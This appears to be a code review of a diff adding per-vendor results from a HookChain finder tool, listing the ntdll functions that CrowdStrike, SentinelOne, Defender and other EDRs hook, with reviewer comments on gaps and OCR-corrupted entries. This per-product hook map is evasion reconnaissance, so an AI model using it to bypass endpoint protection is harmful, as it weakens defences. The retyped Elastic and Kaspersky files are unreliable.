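Review bot: The loaded-module list shows no Cortex XDR component in the process (only ntdll, KERNEL32, KERNELBASE, apphelp and msvcrt), whereas the Check Point, CrowdStrike and SentinelOne results each show the vendor's user-mode DLL alongside its hooks. If the agent did not inject into this process, "0 hooked functions" reflects injection policy rather than hooking behaviour, and the file should not be cited as evidence that Cortex does not hook ntdll. Record the agent version and the prevention/policy mode at capture time, e.g. a header line `# agent: Cortex XDR <version>, mode: <prevent/detect>, injected: no`, and ideally re-run from a process the agent is known to instrument.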
diff --git a/enum/results_enum/crowdstrike.txt b/enum/results_enum/crowdstrike.txt
new file mode 100644
index 0000000..e25e4bf
--- /dev/null
+++ b/enum/results_enum/crowdstrike.txt
@@ -0,0 +1,55 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtAllocateVirtualMemoryEx is hooked
+NtCreateMutant is hooked
+NtDeviceIoControlFile is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendThread is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\lab\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6bf510000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff95f1d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff95e4e0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff95c510000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959860000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff95ef80000.
+C:\Windows\System32\umppc18110.dll is loaded at 0x0000021457050000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at umppc18110.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/defender.txt b/enum/results_enum/defender.txt
new file mode 100644
index 0000000..a2f9c08
--- /dev/null
+++ b/enum/results_enum/defender.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff77bc30000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8ee910000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8eca90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8ec590000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8e9720000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8ee290000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
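Review bot: NtQuerySystemTime is the only function flagged here, and it is also the single entry shared by cortex.txt, defender_atp.txt, elastic.txt, eset.txt, kaspersky.txt and malwarebytes.txt, all with no vendor DLL in the module list; that pattern looks like a detector artefact rather than a Defender hook — the export's prologue on current x64 builds is not a plain syscall stub, so a stub-signature check would flag it — but this should be confirmed by disassembling the export on a host with no security product installed. If confirmed, document it as a known false positive in the tool or README, or annotate the result line, e.g. `NtQuerySystemTime is hooked  (known false positive: non-syscall stub)`, so readers do not count it against Defender.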
diff --git a/enum/results_enum/defender_atp.txt b/enum/results_enum/defender_atp.txt
new file mode 100644
index 0000000..b220b52
--- /dev/null
+++ b/enum/results_enum/defender_atp.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff73b750000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffce6370000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffce4b50000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffce3b30000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffce1160000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffce6070000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/elastic.txt b/enum/results_enum/elastic.txt
new file mode 100644
index 0000000..6b998f3
--- /dev/null
+++ b/enum/results_enum/elastic.txt
@@ -0,0 +1,29 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff647010000.
+C: \Windows \System32\KERNEL32.DLL is loaded at 0x00007f95d0a0000.
+C: \Windows\System32\KERNELBASE.dl1 is loaded at 0x00007f95bd90000.
+C: \Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959060000.
+C: \Windows\System32\msvert.dll is loaded at 0x00007ff95c450000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvert.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
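Review bot: The module lines in this file are not tool output but a transcription: `C: \Windows \System32\KERNEL32.DLL`, `KERNELBASE.dl1`, `msvert.dll` and the 15-digit addresses `0x00007f95d0a0000` / `0x00007f95bd90000` are typical OCR l/1, c/e and dropped-digit errors, and the ntdll.dll line present in every other results file is missing. The IAT section repeats the `msvert.dll` name, so the whole file was likely retyped from a screenshot rather than redirected from stdout. Re-capture with `hookchain_finder64.exe > elastic.txt` (or commit the screenshot alongside) so the Elastic result carries the same weight as the others.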
diff --git a/enum/results_enum/eset.txt b/enum/results_enum/eset.txt
new file mode 100644
index 0000000..1996d6c
--- /dev/null
+++ b/enum/results_enum/eset.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7ed380000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffe3be50000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffe39f90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffe39640000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffe36de0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffe3bb20000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/kaspersky.txt b/enum/results_enum/kaspersky.txt
new file mode 100644
index 0000000..bdc3315
--- /dev/null
+++ b/enum/results_enum/kaspersky.txt
@@ -0,0 +1,27 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6c3400000.
+C:\Windows\System32\ntdll.dll is loaded at 0x00007f9e3930000.
+C:\Windows\System32\KERNEL32.DLL is loaded at exe0007ff9e3210000.
+C:\Windows\System32\KERNELBASE.dl1 is loaded at 0x00007ff9e1640000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff9elae0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
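Review bot: This file also appears to be an OCR transcription rather than captured output: `exe0007ff9e3210000` in place of a `0x` address, `KERNELBASE.dl1`, the non-hex `0x00007ff9elae0000`, and `0x00007f9e3930000` with a dropped digit. The apphelp.dll line present in the other files is missing too, which may be genuine or another transcription loss — it cannot be told apart here. Re-capture with `hookchain_finder64.exe > kaspersky.txt` so the addresses and module names are machine-exact, and drop the stray blank line after "Mapped 478 functions" so the file matches the others' layout.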
diff --git a/enum/results_enum/malwarebytes.txt b/enum/results_enum/malwarebytes.txt
new file mode 100644
index 0000000..0eb98ac
--- /dev/null
+++ b/enum/results_enum/malwarebytes.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6e2cc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb55570000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb55470000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb53020000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb504f0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb539e0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/sentinelone.txt b/enum/results_enum/sentinelone.txt
new file mode 100644
index 0000000..03692a5
--- /dev/null
+++ b/enum/results_enum/sentinelone.txt
@@ -0,0 +1,445 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtCreateThreadEx is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtFreeVirtualMemory is hooked
+NtLoadDriver is hooked
+NtMapUserPhysicalPages is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff770d10000.
+C:\WINDOWS\SYSTEM32\ntd1l.dll is loaded at 0x0000015158f10000.
+C:\WINDOWS\System32\kern3l32.dll is loaded at 0x0000015159110000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff9e1290000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff9e0250000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff9de950000.
+C:\Program Files\SentinelOne\Sentinel Agent 23.3.3.264\InProcessClient64.dll is loaded at 0x00007ff9de4d0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ff9e0780000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff9df9a0000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ff9e0530000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ff9df2d0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ff9decc0000.
+C:\WINDOWS\SYSTEM32\FLTLIB.DLL is loaded at 0x00007ff9de460000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ff9defb0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtMapUserPhysicalPagesScatter is hooked to 0x00007ff9e132d030
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtRaiseHardError is hooked to 0x00007ff9e132fce0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtReplacePartitionUnit is hooked to 0x00007ff9e132fea0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtIsSystemResumeAutomatic is hooked to 0x00007ff9e132f020
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtInitiatePowerAction is hooked to 0x00007ff9e132f000
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationDebugObject is hooked to 0x00007ff9e13302a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFindAtom is hooked to 0x00007ff9e132d250
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationAtom is hooked to 0x00007ff9e132f8c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAddAtomEx is hooked to 0x00007ff9e132dce0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteAtom is hooked to 0x00007ff9e132e9c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtFlushKey is hooked to 0x00007ff9e132ed00
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobSet is hooked to 0x00007ff9e132e5a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationJobObject is hooked to 0x00007ff9e13302e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationJobObject is hooked to 0x00007ff9e132f920
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobObject is hooked to 0x00007ff9e132e580
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAssignProcessToJobObject is hooked to 0x00007ff9e132e1a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtTerminateJobObject is hooked to 0x00007ff9e13307e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenJobObject is hooked to 0x00007ff9e132f3c0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetEaFile is hooked to 0x00007ff9e1330220
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateMailslotFile is hooked to 0x00007ff9e132e620
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtPowerInformation is hooked to 0x00007ff9e132dba0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtGetDevicePowerState is hooked to 0x00007ff9e132ee80
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetThreadExecutionState is hooked to 0x00007ff9e13305a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemEnvironmentValueEx is hooked to 0x00007ff9e1330520
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySystemEnvironmentValueEx is hooked to 0x00007ff9e132fbe0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetVolumeInformationFile is hooked to 0x00007ff9e1330640
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryAttributesFile is hooked to 0x00007ff9e132d770
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryFullAttributesFile is hooked to 0x00007ff9e132f8a0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetTimerResolution is hooked to 0x00007ff9e1330600
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryTimerResolution is hooked to 0x00007ff9e132fc20
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+ |-- KERNEL32.DLL IAT to ntdll.dll of function NtApphelpCacheControl is hooked to 0x00007ff9e132d950
+ |-- KERNEL32.DLL IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ +-- 81 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeDirectoryFileEx is hooked to 0x00007ff9e132f2e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCopyFileChunk is hooked to 0x00007ff9e132e420
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFlushBuffersFile is hooked to 0x00007ff9e132d930
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenMutant is hooked to 0x00007ff9e132f460
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseMutant is hooked to 0x00007ff9e132d3d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKeyTransacted is hooked to 0x00007ff9e132e5c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetDefaultLocale is hooked to 0x00007ff9e13301c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetNlsSectionPtr is hooked to 0x00007ff9e132ef00
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDefaultLocale is hooked to 0x00007ff9e132d270
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeKey is hooked to 0x00007ff9e132f300
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryMultipleValueKey is hooked to 0x00007ff9e132fa60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeletePrivateNamespace is hooked to 0x00007ff9e132ea80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtDuplicateObject is hooked to 0x00007ff9e132d750
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetEvent is hooked to 0x00007ff9e132ff00
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadKeyEx is hooked to 0x00007ff9e132f100
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
